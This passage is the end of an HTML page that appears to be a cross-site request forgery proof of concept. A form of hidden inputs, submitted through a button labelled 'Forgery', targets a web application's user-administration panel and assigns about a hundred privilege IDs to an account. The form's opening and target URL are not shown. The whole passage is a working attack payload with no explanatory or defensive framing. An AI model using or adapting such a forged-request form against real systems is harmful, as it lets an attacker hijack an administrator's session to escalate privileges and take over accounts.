<input type="hidden" name="user.backgroundColour" value="" />
<input type="hidden" name="newMemberships" value="1" />
<input type="hidden" name="user.id" value="" />
<input type="hidden" name="_sourcePage" value="/WEB-INF/jsp/controlPanel/UserAdministration.jsp" />
<input type="hidden" name="__fp" value="user.showBookmarks||user.showNotificationTab||user.emailSystemNotifications||user.addToSiteDirectory||user.showMenu||user.departmentId||user.showAlarmTab||user.smsAlarms||user.showBanner||accountExpires||user.autoDismissFeedback||user.changePasswordOnNextLogin||passwordExpires||user.showUserProfile||user.canUpdateProfile||user.canChangePassword||user.canChangeBookmarks||user.accountEnabled||" />
<input type="hidden" name="newPrivileges" value="7" />
<input type="hidden" name="newPrivileges" value="9" />
<input type="hidden" name="newPrivileges" value="8" />
<input type="hidden" name="newPrivileges" value="10" />
<input type="hidden" name="newPrivileges" value="13" />
<input type="hidden" name="newPrivileges" value="14" />
<input type="hidden" name="newPrivileges" value="12" />
<input type="hidden" name="newPrivileges" value="2" />
<input type="hidden" name="newPrivileges" value="3" />
<input type="hidden" name="newPrivileges" value="4" />
<input type="hidden" name="newPrivileges" value="139" />
<input type="hidden" name="newPrivileges" value="138" />
<input type="hidden" name="newPrivileges" value="141" />
<input type="hidden" name="newPrivileges" value="140" />
<input type="hidden" name="newPrivileges" value="124" />
<input type="hidden" name="newPrivileges" value="128" />
<input type="hidden" name="newPrivileges" value="119" />
<input type="hidden" name="newPrivileges" value="19" />
<input type="hidden" name="newPrivileges" value="17" />
<input type="hidden" name="newPrivileges" value="18" />
<input type="hidden" name="newPrivileges" value="20" />
<input type="hidden" name="newPrivileges" value="21" />
<input type="hidden" name="newPrivileges" value="24" />
<input type="hidden" name="newPrivileges" value="23" />
<input type="hidden" name="newPrivileges" value="132" />
<input type="hidden" name="newPrivileges" value="131" />
<input type="hidden" name="newPrivileges" value="134" />
<input type="hidden" name="newPrivileges" value="147" />
<input type="hidden" name="newPrivileges" value="25" />
<input type="hidden" name="newPrivileges" value="135" />
<input type="hidden" name="newPrivileges" value="105" />
<input type="hidden" name="newPrivileges" value="59" />
<input type="hidden" name="newPrivileges" value="142" />
<input type="hidden" name="newPrivileges" value="28" />
<input type="hidden" name="newPrivileges" value="27" />
<input type="hidden" name="newPrivileges" value="102" />
<input type="hidden" name="newPrivileges" value="31" />
<input type="hidden" name="newPrivileges" value="125" />
<input type="hidden" name="newPrivileges" value="30" />
<input type="hidden" name="newPrivileges" value="108" />
<input type="hidden" name="newPrivileges" value="129" />
<input type="hidden" name="newPrivileges" value="33" />
<input type="hidden" name="newPrivileges" value="34" />
<input type="hidden" name="newPrivileges" value="36" />
<input type="hidden" name="newPrivileges" value="37" />
<input type="hidden" name="newPrivileges" value="38" />
<input type="hidden" name="newPrivileges" value="46" />
<input type="hidden" name="newPrivileges" value="127" />
<input type="hidden" name="newPrivileges" value="41" />
<input type="hidden" name="newPrivileges" value="42" />
<input type="hidden" name="newPrivileges" value="45" />
<input type="hidden" name="newPrivileges" value="44" />
<input type="hidden" name="newPrivileges" value="49" />
<input type="hidden" name="newPrivileges" value="48" />
<input type="hidden" name="newPrivileges" value="112" />
<input type="hidden" name="newPrivileges" value="113" />
<input type="hidden" name="newPrivileges" value="117" />
<input type="hidden" name="newPrivileges" value="115" />
<input type="hidden" name="newPrivileges" value="116" />
<input type="hidden" name="newPrivileges" value="133" />
<input type="hidden" name="newPrivileges" value="51" />
<input type="hidden" name="newPrivileges" value="54" />
<input type="hidden" name="newPrivileges" value="56" />
<input type="hidden" name="newPrivileges" value="55" />
<input type="hidden" name="newPrivileges" value="66" />
<input type="hidden" name="newPrivileges" value="67" />
<input type="hidden" name="newPrivileges" value="60" />
<input type="hidden" name="newPrivileges" value="61" />
<input type="hidden" name="newPrivileges" value="62" />
<input type="hidden" name="newPrivileges" value="68" />
<input type="hidden" name="newPrivileges" value="69" />
<input type="hidden" name="newPrivileges" value="103" />
<input type="hidden" name="newPrivileges" value="104" />
<input type="hidden" name="newPrivileges" value="64" />
<input type="hidden" name="newPrivileges" value="65" />
<input type="hidden" name="newPrivileges" value="71" />
<input type="hidden" name="newPrivileges" value="121" />
<input type="hidden" name="newPrivileges" value="122" />
<input type="hidden" name="newPrivileges" value="85" />
<input type="hidden" name="newPrivileges" value="86" />
<input type="hidden" name="newPrivileges" value="74" />
<input type="hidden" name="newPrivileges" value="76" />
<input type="hidden" name="newPrivileges" value="144" />
<input type="hidden" name="newPrivileges" value="75" />
<input type="hidden" name="newPrivileges" value="77" />
<input type="hidden" name="newPrivileges" value="78" />
<input type="hidden" name="newPrivileges" value="79" />
<input type="hidden" name="newPrivileges" value="73" />
<input type="hidden" name="newPrivileges" value="143" />
<input type="hidden" name="newPrivileges" value="109" />
<input type="hidden" name="newPrivileges" value="110" />
<input type="hidden" name="newPrivileges" value="88" />
<input type="hidden" name="newPrivileges" value="89" />
<input type="hidden" name="newPrivileges" value="90" />
<input type="hidden" name="newPrivileges" value="118" />
<input type="hidden" name="newPrivileges" value="95" />
<input type="hidden" name="newPrivileges" value="93" />
<input type="hidden" name="newPrivileges" value="96" />
<input type="hidden" name="newPrivileges" value="94" />
<input type="hidden" name="newPrivileges" value="92" />
<input type="hidden" name="newPrivileges" value="98" />
<input type="hidden" name="newPrivileges" value="99" />
<input type="hidden" name="newPrivileges" value="146" />
<input type="hidden" name="newPrivileges" value="100" />
<input type="submit" value="Forgery" />
</form>
</body>
</html>